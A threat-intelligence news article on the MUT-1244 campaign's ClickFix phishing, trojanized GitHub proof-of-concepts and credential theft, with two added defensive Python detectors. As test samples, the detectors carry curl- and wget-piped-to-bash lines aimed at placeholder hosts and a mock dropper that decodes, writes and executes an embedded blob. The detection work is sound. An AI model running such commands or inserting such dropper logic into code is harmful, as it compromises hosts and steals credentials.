Source: securityboulevard.com – Author: Jeffrey Burt
An unknown hacker using two initial access techniques has compromised hundreds of victims that include not only threat hunters, pen testers, and other cybersecurity researchers but also other cybercriminals.
The bad actor, dubbed “MUT-1244” by threat researchers with Datadog Security Labs, has stolen sensitive information such as SSH private keys and Amazon Web Services (AWS) access keys from security pros, as well as more than 390,000 credentials from other hackers. Those credentials were likely bought on the dark web in the first place and appear to belong to accounts on WordPress websites.
MUT-1244 – MUT refers to “mysterious unattributed threat” – has been active since at least October and, while using multiple initial access vectors to compromise its targets, delivers the same second-stage payload each time.
The hacker’s work also appears to overlap with findings from another campaign, outlined by Checkmarx researchers in a report in late November, involving a malicious npm package and a malicious GitHub repository. Checkmarx found that the package started out as a legitimate XML-RPC implementation but had malicious code introduced in later versions, so that while it still posed as an XML-RPC library it stole sensitive data every 12 hours and mined cryptocurrency.
The npm package, which had been in the registry for more than a year starting in October 2023 and went through 16 updates, also had an associated GitHub repository, according to the Checkmarx report.
Red Teamers, Researchers are Key Targets
“Security professionals are a valuable target for threat actors, as they tend to have wide privileges and handle sensitive information,” Datadog researchers Christophe Tafani-Dereeper, Matt Muir, and Adrian Korn wrote in a report, noting reports this year by cybersecurity vendors Uptycs and SonicWall about the “opportunistic nature of these attacks, with threat actors publishing fake proof-of-concept exploit code as popular vulnerabilities get disclosed.”
MUT-1244 uses two primary initial access methods, a phishing campaign and attack tools published on GitHub in multiple permutations, they wrote. The first is a phishing campaign targeting academics, the details of which the researchers found in a publicly available Git repository containing the phishing email as well as a database of 2,758 target email addresses of academics scraped from arXiv, the platform that hosts research papers.
The phishing message carries the subject line “Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox” and asks the target to install a fake kernel upgrade. Clicking the link sends the victim to a website where they are asked to copy and paste malicious code into their own terminal. The researchers suggested this is the first documented case of ClickFix – a type of social engineering attack in which the victim is talked into running the attacker’s commands themselves – targeting Linux systems.
If the victim pastes and runs the code, a malicious script from a GitHub repository – since taken down – executes and drops the second-stage info-stealing payload that Checkmarx wrote about.
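A defender reviewing shell history or process-creation telemetry from a Linux host can look for the shape of a ClickFix paste: a remote script fetched and piped straight into a shell, or an inline blob decoded and run. The following is an added example, not tooling from the Datadog report or this article; it runs a few such rules over shell-history lines that are constructed for illustration (the hosts and script names are invented).

```python
import re

# Rule set for the command shapes a ClickFix lure asks a Linux user to paste.
# Each entry is (rule name, compiled pattern); the set is a starting point,
# not a complete catalogue of ways to run remote content.
RULES = [
    # curl/wget output piped into sh, bash, dash or zsh, optionally via sudo
    ("fetch_pipe_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")),
    # inline base64 blob decoded and piped into a shell
    ("base64_pipe_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|;&]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")),
    # command substitution that fetches and runs remote content in one go
    ("eval_fetch",
     re.compile(r"\b(eval|(ba|da|z)?sh\s+-c)\s+[\"']?\$\(\s*(curl|wget)\b")),
]


def scan_history(lines):
    """Return (line number, rule name, command) for each line matching a rule.
    Input is an iterable of command strings, e.g. the lines of ~/.bash_history
    or the command-line field of process-creation telemetry."""
    hits = []
    for lineno, cmd in enumerate(lines, start=1):
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((lineno, name, cmd.strip()))
                break  # one finding per line is enough
    return hits


# Constructed sample history: the hosts and script names below are invented.
SAMPLE_HISTORY = [
    "cd ~/src/hpc-jobs",
    "curl -fsSL https://example.invalid/microcode-update.sh | sudo bash",
    "echo aGVsbG8= | base64 -d",
    "ls -la /lib/modules",
    "wget -qO- https://example.invalid/hpc-kernel.sh | bash",
    'bash -c "$(curl -s https://example.invalid/setup)"',
    "echo ZWNobyBoaQ== | base64 --decode | sh",
    "curl -s https://example.invalid/release.json | jq .version",
]

if __name__ == "__main__":
    for lineno, rule, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {rule}: {cmd}")
```

The last two benign-looking lines matter as much as the hits: decoding base64 without a shell on the other side of the pipe, or piping curl into jq, is normal and should stay quiet, otherwise the rule drowns in noise on a developer workstation.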
Fake POCs for Exploiting CVEs
The second initial access avenue used by MUT-1244 is a set of “malicious GitHub users publishing fake proof-of-concepts for CVEs,” Tafani-Dereeper, Muir, and Korn wrote. “We’ve observed that these dozens of users form a cluster, often starring and forking each other’s repositories. Most of them were created in October or November, have no legitimate activity, and have an AI-generated profile picture.”
Each malicious commit – some of which have since been taken down – lists “Robert” as the committer along with a ProtonMail address, which makes it easy to link them to MUT-1244, the researchers wrote. All of the repositories drop the same second-stage payload as the phishing campaign and the npm package Checkmarx found.
Multiple Ways to Drop Payload
The repositories drop the payload in varying ways, however. Some embed a legitimate and likely working exploit that also carries a backdoor. In others the info-stealing malware is hidden in a PDF file, or delivered by a Python dropper: the bad actor copies legitimate exploit code and inserts a backdoor that decodes a base64-encoded payload, writes it to disk, and executes it.
Other repositories infect the target indirectly by listing the malicious npm package as a dependency in package.json; the package drops the same second-stage payload by decoding an embedded base64 string, writing it to disk, and executing it. The npm package and payload contain hardcoded credentials, including a Dropbox access token and another token, both of which let the holder list and download the exfiltrated files.
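Before running a downloaded PoC, it is worth checking whether the code does more than the exploit it advertises. The added example below is my own and not tooling from Datadog or Checkmarx; it parses a Python file with the standard `ast` module and reports the stages of the dropper chain described above: decode an embedded base64 blob, write it to disk, execute it. The two sample PoCs it scans are constructed for illustration and exploit nothing; the module and function names in the detection sets are real standard-library calls, but the sets are a heuristic starting point rather than a complete list.

```python
import ast
import re

# Standard-library calls that turn an embedded blob back into bytes.
DECODE_CALLS = {"base64.b64decode", "base64.b32decode", "base64.decodebytes",
                "zlib.decompress", "bz2.decompress", "lzma.decompress"}
# Calls that hand control to a new process or to dynamically built code.
EXEC_SINKS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_call", "subprocess.check_output", "os.system",
              "os.popen", "os.execv", "os.execvp", "os.execve", "exec", "eval"}
# A long unbroken run of the base64 alphabet is the embedded payload itself.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")

def _aliases(tree):
    """Map local names to what they import, so 'import base64 as b' and
    'from subprocess import Popen as P' still resolve to the real callee."""
    alias = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                alias[a.asname or a.name.split(".")[0]] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                alias[a.asname or a.name] = f"{node.module}.{a.name}"
    return alias

def _callee(func, alias):
    """Dotted name of a call target, e.g. 'subprocess.Popen', or None."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if not isinstance(func, ast.Name):
        return None
    parts.append(alias.get(func.id, func.id))
    return ".".join(reversed(parts))

def _opens_for_write(call):
    """True for open(path, 'w'/'wb'/'a'/'x') with a literal positional mode."""
    if len(call.args) > 1 and isinstance(call.args[1], ast.Constant):
        mode = call.args[1].value
        return isinstance(mode, str) and any(c in mode for c in "wax")
    return False

def scan_source(src, filename="<poc>"):
    """Report which dropper stages appear in one Python file, by line number.
    A file is flagged when it both decodes a blob and reaches an execution sink;
    'write' and 'blob' hits are listed so a reviewer can confirm the chain."""
    tree = ast.parse(src, filename)
    alias = _aliases(tree)
    stages = {"decode": [], "write": [], "exec": [], "blob": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if B64_BLOB.match(node.value):
                stages["blob"].append(node.lineno)
        elif isinstance(node, ast.Call):
            name = _callee(node.func, alias) or ""
            if name in DECODE_CALLS:
                stages["decode"].append(node.lineno)
            elif name in EXEC_SINKS:
                stages["exec"].append(node.lineno)
            elif name == "os.chmod" or (name == "open" and _opens_for_write(node)) \
                    or name.endswith((".write_bytes", ".write_text")):
                stages["write"].append(node.lineno)
    stages = {k: sorted(v) for k, v in stages.items()}
    return {"file": filename, "stages": stages,
            "suspicious": bool(stages["decode"] and stages["exec"])}

# Constructed sample: a PoC that only sends its crafted request.
BENIGN_POC = """\
import sys, requests

def exploit(target):
    return requests.post(f"http://{target}/api", data={"q": "x"}).status_code

print(exploit(sys.argv[1]))
"""

# Constructed sample: the same PoC with a dropper spliced in, in the shape the
# article describes: decode an embedded base64 string, write it to disk, run it.
TROJANIZED_POC = """\
import os, sys, subprocess, requests
import base64 as b

PAYLOAD = "%s"

def exploit(target):
    return requests.post(f"http://{target}/api", data={"q": "x"}).status_code

def _init():
    path = os.path.join("/tmp", ".cache")
    with open(path, "wb") as fh:
        fh.write(b.b64decode(PAYLOAD))
    os.chmod(path, 0o755)
    subprocess.Popen([path])

_init()
print(exploit(sys.argv[1]))
""" % ("QUFB" * 60)  # placeholder blob, not a real payload

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_POC), ("trojanized", TROJANIZED_POC)):
        print(label, scan_source(src, label))
```

Run it over every `.py` file in a cloned repository before executing anything; a file with hits in both the `decode` and `exec` stages is the one to read by hand. The check is name-based, so obfuscation such as `getattr(__import__("os"), "system")` evades it; treat a clean result as a prompt to read the code, not as clearance.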
MUT-1244 has compromised the systems of dozens of victims, most of them red teamers, security researchers, and others who wanted to download POC exploit code, the Datadog researchers wrote, giving the attacker access to sensitive information including private SSH keys, AWS credentials, and command history.
Stealing From the Thieves
Along the way, the bad actor accessed more than 390,000 credentials that Tafani-Dereeper, Muir, and Korn believe were exfiltrated to Dropbox and stolen from other hackers, who had acquired them on the dark web and were then compromised by MUT-1244 when they ran malicious code in a trojanized “yawpp” GitHub project to check the validity of the credentials.
“Since MUT-1244 advertised yawpp as a ‘credentials checker’ for WordPress, it’s no surprise that an attacker with a set of stolen credentials (which are often purchased from underground markets as a way to speed up threat actor operations) would use yawpp to validate them,” Tafani-Dereeper, Muir, and Korn wrote.
Original Post URL: https://securityboulevard.com/2024/12/hacker-uses-info-stealer-against-security-pros-other-bad-actors/
Category & Tags: Cloud Security,Cybersecurity,Data Privacy,Data Security,Featured,Identity & Access,Malware,Network Security,News,Security Boulevard (Original),Social – Facebook,Social – LinkedIn,Social – X,Social Engineering,Spotlight,Threat Intelligence,Vulnerabilities,cybersecurity professionals,Datadog,Information stealing malware,wordpress